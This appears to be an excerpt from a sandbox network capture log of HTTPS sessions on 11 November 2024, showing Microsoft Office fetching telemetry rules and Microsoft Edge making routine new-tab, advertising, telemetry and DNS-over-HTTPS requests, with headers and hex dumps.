2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 1815e533-001e-0028-01d5-33c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f7845968glpgnhC1EWR7uec00000005sg00000000a8de x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.5	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 642c93e8-001e-0014-7cd5-335151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230627Z-174f7845968cdxdrhC1EWRg0en00000005kg0000000098by x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49840	108.139.47.33	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	925	OUT	GET /b?rn=1731366386050&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=11FAD531813A66492642C0058058675E&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:27 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Mon, 11 Nov 2024 23:06:27 GMT Location: /b2?rn=1731366386050&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=11FAD531813A66492642C0058058675E&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=1296350c4b632a8fa60522d1731366387; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=1296350c4b632a8fa60522d1731366387; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 1d2861d9b6c0fd303c8b7539b394c190.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK50-P1 X-Amz-Cf-Id: wDLE9gtZchzXL95Lj5SuOggBM32bx1LiSL46O8yrYbqQpnfb3dOuPA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49839	20.110.205.119	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	1175	OUT	GET /c.gif?rnd=1731366386049&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f29aaf89f12a45dd89a5f5206a84f4ea&activityId=f29aaf89f12a45dd89a5f5206a84f4ea&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
2024-11-11 23:06:27 UTC	1108	IN	HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Location: https://c.bing.com/c.gif?rnd=1731366386049&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f29aaf89f12a45dd89a5f5206a84f4ea&activityId=f29aaf89f12a45dd89a5f5206a84f4ea&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=06FBC860557247358032020AD74BA317&RedC=c.msn.com&MXFR=11FAD531813A66492642C0058058675E Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=11FAD531813A66492642C0058058675E; domain=.msn.com; expires=Sat, 06-Dec-2025 23:06:27 GMT; path=/; SameSite=None; Secure; Priority=High; Date: Mon, 11 Nov 2024 23:06:26 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49842	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:27 UTC	576	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Thu, 07 Nov 2024 20:03:34 GMT ETag: 0x8DCFF6742E8F24C x-ms-request-id: 3f44444a-801e-0076-1066-34ecbb000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230627Z-174f7845968vqt9xhC1EWRgten00000005m000000000gpta Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 23:06:27 UTC	15808	IN	Data Raw: 1f 8b 08 08 16 1d 2d 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: -gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-11-11 23:06:27 UTC	16384	IN	Data Raw: c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 Data Ascii: qb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:
2024-11-11 23:06:27 UTC	16384	IN	Data Raw: c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b Data Ascii: Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|crkX
2024-11-11 23:06:27 UTC	16384	IN	Data Raw: 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc Data Ascii: AHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;
2024-11-11 23:06:27 UTC	5247	IN	Data Raw: 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e Data Ascii: *'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49841	20.75.60.91	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	1067	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=11FAD531813A66492642C0058058675E&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=15da7b1a494847d6986ff006e626cc18 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
2024-11-11 23:06:27 UTC	674	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 297 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 11 Nov 2024 23:06:26 GMT Connection: close
2024-11-11 23:06:27 UTC	297	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49838	20.189.173.13	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731366386047&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3809 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1
2024-11-11 23:06:27 UTC	3809	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 32 33 3a 30 36 3a 32 36 2e 30 34 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 33 65 64 62 63 38 35 2d 37 37 31 63 2d 34 36 30 34 2d 39 62 30 37 2d 66 61 64 63 37 64 39 61 61 31 61 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 35 30 35 36 34 39 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-11T23:06:26.043Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"53edbc85-771c-4604-9b07-fadc7d9aa1ac","epoch":"2250564903"},"app":{"locale
2024-11-11 23:06:27 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=8cea7f37a720483aab0ccc5b34120eb3&HASH=8cea&LV=202411&V=4&LU=1731366387556; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 23:06:27 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=445d763e75b3472c8bcfef313c40cc04; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 23:36:27 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1509 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 23:06:27 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	49850	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:27 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:27 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 04 65 64 67 65 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 51 00 0c 00 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: edgemicrosoftcom)QM
2024-11-11 23:06:27 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 23:06:27 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e11eed2ae570f78-EWR alt-svc: h3=":443"; ma=86400
